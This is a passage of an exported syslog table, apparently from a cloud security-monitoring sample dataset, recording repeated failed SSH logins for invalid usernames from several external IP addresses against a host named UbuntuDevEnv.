+18045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:34,UbuntuDevEnv,2019-06-26 09:34:34,auth,UbuntuDevEnv,info,Disconnected from invalid user vianney 115.159.216.187 port 37625 [preauth],72764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vianney,115.159.216.1,37625,,
+18046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:34,UbuntuDevEnv,2019-06-26 09:34:34,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 37625:11: Bye Bye [preauth],72764,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,37625,,
+18047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:41,UbuntuDevEnv,2019-06-26 09:34:40,auth,UbuntuDevEnv,info,Invalid user amwambogo from 176.31.202.90 port 46234,72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,176.31.202.9,46234,,
+18048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:41,UbuntuDevEnv,2019-06-26 09:34:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:41,UbuntuDevEnv,2019-06-26 09:34:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18050,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:43,UbuntuDevEnv,2019-06-26 09:34:43,auth,UbuntuDevEnv,info,Failed password for invalid user amwambogo from 176.31.202.90 port 46234 ssh2,72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,176.31.202.9,46234,,
+18051,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:43,UbuntuDevEnv,2019-06-26 09:34:43,auth,UbuntuDevEnv,info,Disconnected from invalid user amwambogo 176.31.202.90 port 46234 [preauth],72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,amwambogo,176.31.202.9,46234,,
+18052,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:43,UbuntuDevEnv,2019-06-26 09:34:43,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 46234:11: Bye Bye [preauth],72807,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,46234,,
+18053,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:45,UbuntuDevEnv,2019-06-26 09:34:44,auth,UbuntuDevEnv,info,Invalid user fin from 176.31.43.255 port 34042,72817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fin,176.31.43.2,34042,,
+18054,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:45,UbuntuDevEnv,2019-06-26 09:34:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18055,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:45,UbuntuDevEnv,2019-06-26 09:34:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,72817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18056,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:47,UbuntuDevEnv,2019-06-26 09:34:46,auth,UbuntuDevEnv,info,Failed password for invalid user fin from 176.31.43.255 port 34042 ssh2,72817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fin,176.31.43.2,34042,,
+18057,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:47,UbuntuDevEnv,2019-06-26 09:34:46,auth,UbuntuDevEnv,info,Disconnected from invalid user fin 176.31.43.255 port 34042 [preauth],72817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,fin,176.31.43.2,34042,,
+18058,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:47,UbuntuDevEnv,2019-06-26 09:34:46,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 34042:11: Bye Bye [preauth],72817,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,34042,,
+18059,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:53,UbuntuDevEnv,2019-06-26 09:34:53,auth,UbuntuDevEnv,info,Invalid user helpdesk from 118.24.90.122 port 54690,72833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helpdesk,118.24.90.1,54690,,
+18060,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:53,UbuntuDevEnv,2019-06-26 09:34:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,72833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+18061,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:53,UbuntuDevEnv,2019-06-26 09:34:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18062,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:55,UbuntuDevEnv,2019-06-26 09:34:55,auth,UbuntuDevEnv,info,Failed password for invalid user helpdesk from 118.24.90.122 port 54690 ssh2,72833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helpdesk,118.24.90.1,54690,,
+18063,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:57,UbuntuDevEnv,2019-06-26 09:34:56,auth,UbuntuDevEnv,info,Disconnected from invalid user helpdesk 118.24.90.122 port 54690 [preauth],72833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,helpdesk,118.24.90.1,54690,,
+18064,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:34:57,UbuntuDevEnv,2019-06-26 09:34:56,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 54690:11: Bye Bye [preauth],72833,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,54690,,
+18065,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:31,UbuntuDevEnv,2019-06-26 09:35:31,auth,UbuntuDevEnv,info,Invalid user xiu from 165.22.203.187 port 55026,72984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,165.22.203.1,55026,,
+18066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:31,UbuntuDevEnv,2019-06-26 09:35:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,72984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:31,UbuntuDevEnv,2019-06-26 09:35:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,72984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:33,UbuntuDevEnv,2019-06-26 09:35:33,auth,UbuntuDevEnv,info,Failed password for invalid user xiu from 165.22.203.187 port 55026 ssh2,72984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,165.22.203.1,55026,,
+18069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:33,UbuntuDevEnv,2019-06-26 09:35:33,auth,UbuntuDevEnv,info,Disconnected from invalid user xiu 165.22.203.187 port 55026 [preauth],72984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,xiu,165.22.203.1,55026,,
+18070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:33,UbuntuDevEnv,2019-06-26 09:35:33,auth,UbuntuDevEnv,info,Received disconnect from 165.22.203.187 port 55026:11: Bye Bye [preauth],72984,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,165.22.203.1,55026,,
+18071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:39,UbuntuDevEnv,2019-06-26 09:35:39,auth,UbuntuDevEnv,info,Invalid user workshop from 118.24.90.122 port 63120,73006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,workshop,118.24.90.1,63120,,
+18072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:39,UbuntuDevEnv,2019-06-26 09:35:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:39,UbuntuDevEnv,2019-06-26 09:35:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=118.24.90.122,73006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,118.24.90.1,,0,
+18074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:41,UbuntuDevEnv,2019-06-26 09:35:41,auth,UbuntuDevEnv,info,Failed password for invalid user workshop from 118.24.90.122 port 63120 ssh2,73006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,workshop,118.24.90.1,63120,,
+18075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:41,UbuntuDevEnv,2019-06-26 09:35:41,auth,UbuntuDevEnv,info,Received disconnect from 118.24.90.122 port 63120:11: Bye Bye [preauth],73006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,118.24.90.1,63120,,
+18076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:41,UbuntuDevEnv,2019-06-26 09:35:41,auth,UbuntuDevEnv,info,Disconnected from invalid user workshop 118.24.90.122 port 63120 [preauth],73006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,workshop,118.24.90.1,63120,,
+18077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:45,UbuntuDevEnv,2019-06-26 09:35:45,auth,UbuntuDevEnv,info,Invalid user attack from 187.6.249.142 port 37334,73037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,attack,187.6.249.1,37334,,
+18078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:45,UbuntuDevEnv,2019-06-26 09:35:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:45,UbuntuDevEnv,2019-06-26 09:35:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=187.6.249.142,73037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,187.6.249.1,,0,
+18080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:47,UbuntuDevEnv,2019-06-26 09:35:47,auth,UbuntuDevEnv,info,Failed password for invalid user attack from 187.6.249.142 port 37334 ssh2,73037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,attack,187.6.249.1,37334,,
+18081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:47,UbuntuDevEnv,2019-06-26 09:35:47,auth,UbuntuDevEnv,info,Received disconnect from 187.6.249.142 port 37334:11: Bye Bye [preauth],73037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,187.6.249.1,37334,,
+18082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:35:47,UbuntuDevEnv,2019-06-26 09:35:47,auth,UbuntuDevEnv,info,Disconnected from invalid user attack 187.6.249.142 port 37334 [preauth],73037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,attack,187.6.249.1,37334,,
+18083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:10,UbuntuDevEnv,2019-06-26 09:36:09,auth,UbuntuDevEnv,info,Invalid user guest from 176.31.202.90 port 34806,73133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,176.31.202.9,34806,,
+18084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:10,UbuntuDevEnv,2019-06-26 09:36:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:10,UbuntuDevEnv,2019-06-26 09:36:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.202.90,73133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.202.9,,0,
+18086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:11,UbuntuDevEnv,2019-06-26 09:36:11,auth,UbuntuDevEnv,info,Failed password for invalid user guest from 176.31.202.90 port 34806 ssh2,73133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,176.31.202.9,34806,,
+18087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:11,UbuntuDevEnv,2019-06-26 09:36:11,auth,UbuntuDevEnv,info,Received disconnect from 176.31.202.90 port 34806:11: Bye Bye [preauth],73133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.202.9,34806,,
+18088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:11,UbuntuDevEnv,2019-06-26 09:36:11,auth,UbuntuDevEnv,info,Disconnected from invalid user guest 176.31.202.90 port 34806 [preauth],73133,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,guest,176.31.202.9,34806,,
+18089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:12,UbuntuDevEnv,2019-06-26 09:36:11,auth,UbuntuDevEnv,info,Invalid user jacinta.cali from 176.31.43.255 port 42180,73149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacinta,176.31.43.2,42180,,
+18090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:12,UbuntuDevEnv,2019-06-26 09:36:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=176.31.43.255,73149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,176.31.43.2,,0,
+18091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:12,UbuntuDevEnv,2019-06-26 09:36:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:14,UbuntuDevEnv,2019-06-26 09:36:13,auth,UbuntuDevEnv,info,Failed password for invalid user jacinta.cali from 176.31.43.255 port 42180 ssh2,73149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacinta,176.31.43.2,42180,,
+18093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:14,UbuntuDevEnv,2019-06-26 09:36:13,auth,UbuntuDevEnv,info,Received disconnect from 176.31.43.255 port 42180:11: Bye Bye [preauth],73149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,176.31.43.2,42180,,
+18094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:14,UbuntuDevEnv,2019-06-26 09:36:13,auth,UbuntuDevEnv,info,Disconnected from invalid user jacinta.cali 176.31.43.255 port 42180 [preauth],73149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacinta,176.31.43.2,42180,,
+18095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:26,UbuntuDevEnv,2019-06-26 09:36:25,auth,UbuntuDevEnv,info,Invalid user video from 115.159.216.187 port 45673,73192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,video,115.159.216.1,45673,,
+18096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:26,UbuntuDevEnv,2019-06-26 09:36:25,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=115.159.216.187,73192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,115.159.216.1,,0,
+18097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:26,UbuntuDevEnv,2019-06-26 09:36:25,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:28,UbuntuDevEnv,2019-06-26 09:36:27,auth,UbuntuDevEnv,info,Failed password for invalid user video from 115.159.216.187 port 45673 ssh2,73192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,video,115.159.216.1,45673,,
+18099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:28,UbuntuDevEnv,2019-06-26 09:36:27,auth,UbuntuDevEnv,info,Disconnected from invalid user video 115.159.216.187 port 45673 [preauth],73192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,video,115.159.216.1,45673,,
+18100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:28,UbuntuDevEnv,2019-06-26 09:36:27,auth,UbuntuDevEnv,info,Received disconnect from 115.159.216.187 port 45673:11: Bye Bye [preauth],73192,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,115.159.216.1,45673,,
+18101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:55,UbuntuDevEnv,2019-06-26 09:36:55,auth,UbuntuDevEnv,info,Invalid user jacinta.cali from 165.22.203.187 port 48560,73298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacinta,165.22.203.1,48560,,
+18102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:55,UbuntuDevEnv,2019-06-26 09:36:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,73298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:55,UbuntuDevEnv,2019-06-26 09:36:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.203.187,73298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,165.22.203.1,,0,
+18104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 09:36:57,UbuntuDevEnv,2019-06-26 09:36:56,auth,UbuntuDevEnv,info,Failed password for invalid user jacinta.cali from 165.22.203.187 port 48560 ssh2,73298,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jacinta,165.22.203.1,48560,,
